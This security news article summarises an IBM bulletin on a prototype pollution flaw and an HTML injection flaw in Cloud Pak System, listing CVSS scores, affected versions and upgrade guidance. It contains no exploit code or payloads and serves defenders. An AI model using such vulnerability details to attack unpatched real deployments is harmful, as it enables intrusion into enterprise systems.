IBM Cloud Pak System Vulnerabilities Let Attackers Inject Malicious HTML Code

IBM has disclosed multiple critical security vulnerabilities in its Cloud Pak System platform that could allow attackers to inject malicious HTML code and manipulate JavaScript application prototypes.

The vulnerabilities, tracked as CVE-2020-5258 and CVE-2025-2895, affect various versions of the enterprise cloud management platform across both Intel and Power architectures, with the more severe vulnerability earning a CVSS score of 7.5.

IBM’s latest security bulletin, published on June 30, 2025, reveals that Cloud Pak System contains two distinct vulnerabilities that pose significant risks to enterprise environments:

• CVE-2020-5258 – Prototype Pollution Vulnerability: This vulnerability stems from a prototype pollution issue in the Dojo JavaScript framework’s deepCopy method, allowing attackers to inject properties into existing JavaScript language construct prototypes and effectively manipulate the base object by injecting malicious values that can overwrite or pollute JavaScript application objects.
  
• CVE-2025-2895 – HTML Injection Vulnerability: This represents an HTML injection vulnerability that enables remote attackers to inject malicious HTML code into the platform, with a CVSS base score of 5.4 indicating moderate severity but significant potential for exploitation in enterprise environments.
  
• Cross-Site Scripting Impact: When victims view the compromised content from the HTML injection vulnerability, the malicious code executes within their web browser under the security context of the hosting site.

IBM Cloud Pak System Vulnerabilities

The prototype pollution vulnerability in CVE-2020-5258 exploits improper control mechanisms in code generation, classified under CWE-94.

With a CVSS vector of (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N), this vulnerability can be exploited remotely without authentication or user interaction, making it particularly dangerous.

Attackers can leverage this vulnerability to inject arbitrary properties into JavaScript prototypes, potentially leading to application logic manipulation, data corruption, or unauthorized access to sensitive information.

The HTML injection vulnerability, categorized under CWE-80 for improper neutralization of script-related HTML tags, operates through a different attack vector.

Its CVSS vector (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N) indicates that while the attack requires low-level privileges and user interaction, it can still result in cross-site contamination with potential for information disclosure and integrity compromise.

Immediate Action

IBM has identified multiple versions of Cloud Pak System as vulnerable across different architectures.

For Intel-based systems, affected versions include 2.3.3.6, 2.3.4.0, and IBM Cloud Pak System Software Suite 2.3.4.1, along with their respective iFix releases.

Power architecture systems running versions 2.3.3.7 and 2.3.5.0 are also at risk.

IBM strongly recommends that organizations running Intel-based Cloud Pak System deployments immediately upgrade to version 2.3.6.0, which is available through IBM Fix Central and Passport Advantage Online.

For Power architecture users, IBM advises contacting IBM Support directly for remediation guidance. Organizations running unsupported versions should prioritize upgrading to currently supported product versions.

The company has indicated that no workarounds or mitigations are available for these vulnerabilities, making immediate patching the only effective defense strategy.

Enterprise security teams should treat these vulnerabilities as high-priority given their potential for remote exploitation and the critical nature of cloud infrastructure platforms in modern enterprise environments.

Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant Updates.